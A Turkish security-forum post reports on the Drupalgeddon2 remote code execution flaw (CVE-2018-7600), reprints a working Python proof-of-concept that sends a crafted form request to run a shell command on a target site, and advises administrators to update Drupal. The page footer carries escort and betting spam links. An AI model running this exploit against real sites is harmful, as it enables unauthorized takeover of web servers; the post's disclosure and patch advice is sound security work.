#1  
Alt 06.Ocak.2019, 04:47
Syst3m Syst3m isimli Üye şimdilik offline konumundadır
Kurucu Admin
 
Üyelik tarihi: 03.Aralık.2018
Mesajlar: 99
Standart Drupal’da bulunan RCE için exploit yayınlandı



Hacker’ların Drupal üzerinden bulunan RCE (Remote Command Execution) güvenlik açığı için kullanılan exploit’i yayınlamasından bu yana Drupal sistemlerine yapılan saldırılara inanılmaz bir miktarda artış var.

İki hafta önce yaklaşık olarak, Drupal güvenlik ekibi saldırganların savunmasız web sitelerini tamamen ele geçirmelerine olanak sağlayan Durpalgeddon2 adı verilen son derece kritik bir RCE güvenlik açığı keşfedildi.

Şirket bu güvenlik açığını gidermek için, Drupal CMS’in güncel sürümünü yayınladı ve bir milyondan fazla Drupal kullanılan sitenin saldırıya maruz kalmasını engelledi. Şirket bu güncellemeyi yaparken sistem üzerinden bulunan güvenlik açığı hakkında herhangi bir teknik yazı yayınlamadı.

İki gün önce, Check Point ve Dofinity‘deki güvenlik araştırmacıları, bu güvenlik açığına (CVE-2018-7600) ilişkin teknik detayları yayınladılar. Bu teknik yazıda, bir Rus güvenlik araştırmacısı, GitHub’da Drupalgeddon2 için bir Proof of Concept (PoC) istismar kodu yayınladı.

Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)

#!/usr/bin/env
import sys
import requests

print (‘################################################ ################’)
print (‘# Proof-Of-Concept for CVE-2018-7600’)
print (‘# by Vitalii Rudnykh’)
print (‘# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders’)
print (‘# https://github.com/a2u/CVE-2018-7600’)
print (‘################################################ ################’)
print (‘Provided only for educational or information purposes\n’)

target = input(‘Enter target url (example: https://domain.ltd/): ‘)

# Add proxy support (eg. BURP to analyze HTTP(s) traffic)
# set verify = False if your proxy certificate is self signed
# remember to set proxies both for http and https
#
# example:
# proxies = {‘http’: ‘http://127.0.0.1:8080’, ‘https’: ‘http://127.0.0.1:8080’}
# verify = False
proxies = {}
verify = True

url = target + ‘user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax’
payload = {‘form_id’: ‘user_register_form’, ‘_drupal_ajax’: ‘1’, ‘mail[#post_render][]’: ‘exec’, ‘mail[#type]’: ‘markup’, ‘mail[#markup]’: ‘echo “;-)” | tee hello.txt’}

r = requests.post(url, proxies=proxies, data=payload, verify=verify)
if r.status_code != 200:
sys.exit(“Not exploitable”)
print (‘\nCheck: ‘+target+’hello.txt’)

Drupal’ın 6’dan 8’e kadar olan tüm sürümlerini etkileyen Drupalgeddon2 güvenlik açığı, saldırganların uzaktan kötü amaçlı kod çalıştırmalarına olanak sağlıyor.

Checkpoint’in açıklamasına göre, Form API (FAPI) AJAX istekleri yoluyla iletilen girdilerin yeterli önlem alınmamasıdan ötürü güvenlik açığı oluşuyor.

Check Point araştırmacıları, “Sonuç olarak, saldırganın iç form yapısına zararlı bir dosya veya kod parçası enjekte etmesini sağlıyor. Bu, Drupal üzerinde kimlik doğrulaması olmadan çalıştırılmasına olanak tanıyor.” dedi ve ekledi “Bu güvenlik açığından yararlanarak, bir saldırgan herhangi bir Drupal tabanlı bir siteyi tamamen ele geçirmesini sağlıyor.”.

Birçok kişi tarafından doğru ve ektili olarak çalıştığı söylenen PoC kodunun herkese açılmasından kısa bir süre sonra, Sucuri, Imperva ve SANS Internet Storm Center araştırmacıları Drupalgeddon2’yi kullanarak Drupal sitelere yönelik saldırıların başladığını gözlemlemeye başladılar ancak hiçbiri henüz saldırılara ilişkin bir rapor yayınlamadı.

Drupal’ın savunmasız sürümlerini kullanan site yöneticilerinin, CMS’yi Drupal 7.58‘e veya Drupal 8.5.1‘e en kısa sürede güncelleştirerek bu güvenlik açığını yamalamaları önerilir.

Güvenlik açığı, Şubat 2016’dan bu yana artık şirket tarafından desteklenmeyen Drupal 6’yı da etkiliyor, ancak bu sürüm için de bir yama oluşturuldu.
Alıntı ile Cevapla
Cevapla

Etiketler
açığı, bir, bulunan, drupal, drupal’da, exploit, güvenlik, için, print, rce, yayınlandı

Seçenekler
Stil

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok

BB kodu Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı

Forum Jump


Tüm Zamanlar GMT Olarak Ayarlanmış. Şuanki Zaman: 19:32.

Ferizli Haber Düzce Haber Kaynarca Haber Okey Oyna Hemen İndir indirin.net itiraf sitesi trsikayet.com

Search Engine Optimisation provided by DragonByte SEO v2.0.36 (Lite) - vBulletin Mods & Addons Copyright © 2024 DragonByte Technologies Ltd.

Sex hikaye moldebet

Antalya Seo tesbih ankara escort ankara escort ankara escort bayan escort ankara kızılay escort çankaya escort kızılay escort ankara eskort eryaman escort adana escort eryaman escort gaziantep escort bayan gaziantep escort